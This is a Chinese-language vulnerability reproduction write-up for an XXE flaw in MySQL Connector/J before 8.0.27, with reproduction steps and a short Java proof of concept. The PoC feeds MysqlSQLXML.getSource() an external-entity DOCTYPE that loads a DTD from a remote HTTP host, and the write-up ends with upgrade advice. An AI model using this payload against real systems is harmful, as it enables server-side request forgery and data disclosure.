漏洞简介
这个漏洞是由于 MySQL JDBC 8.0.27 版本之前,存在 getSource ()方法未对传入的 XML 数据做校验,导致攻击者可以在 XML 数据中引入外部实体,造成 XXE 攻击。
影响版本
MySQL Connector/J 8.0.27 之前
漏洞复现
这里采用的复现环境链接为: https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe
可以看到是mysql-connector-java 8.0.26的版本;
下载mysql-connector-java8.0.26的jar包并导入,下载链接:https://downloads.mysql.com/archives/c-j/
导入过程就不写了。。。
定位到处理XML格式的类com.mysql.cj.jdbc.MysqlSQLXML;
搜索getSource方法,可以看见当执行getSource()方法时,如果输入参数为DOMSource.class时,DocumentBuilder会直接newInstance实例化对象,stringRep会被带入并完成XML解析,没有进行校验和判断,从而导致出现XXE漏洞。
创建数据库test、表tb_test、字段message并插入数据,这里ip是我远程开启http服务的机子,代码中getSQLXML(java.lang.String)方法是用于查询表中字段为message的值,将返回的消息字段通过SQLXML解析为org.h2.jdbc.JdbcSQLXML类的对象:
连接数据库
开启http服务
运行该poc
收到了http请求
这里也可以不使用该复现环境,新建项目文件,导入jar包后,直接写入下面的poc,运行。
代码中setString是MysqlSQLXML继承的SQLXML类中的方法,用于对stringRep变量进行赋值从而被带入DocumentBuilder的实例化对象完成XML解析。
package mysqlxxetest;
import java.sql.SQLException;
import javax.xml.transform.dom.DOMSource;
import com.mysql.cj.jdbc.MysqlSQLXML;
public class test {
public static void main(String[] args) throws SQLException {
MysqlSQLXML myXML = new MysqlSQLXML(null);
myXML.setString("<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://192.168.190.130:80/xxe.dtd\"> %xxe;]>");
myXML.getSource(DOMSource.class);
}
}
可以看见也收到了请求
参考链接:https://github.com/h2database/h2database/issues/3195
https://pyn3rd.github.io/2021/10/22/mysql-jdbc-xxe/
修复方法
官方已发布漏洞补丁及修复版本,升级至安全版本。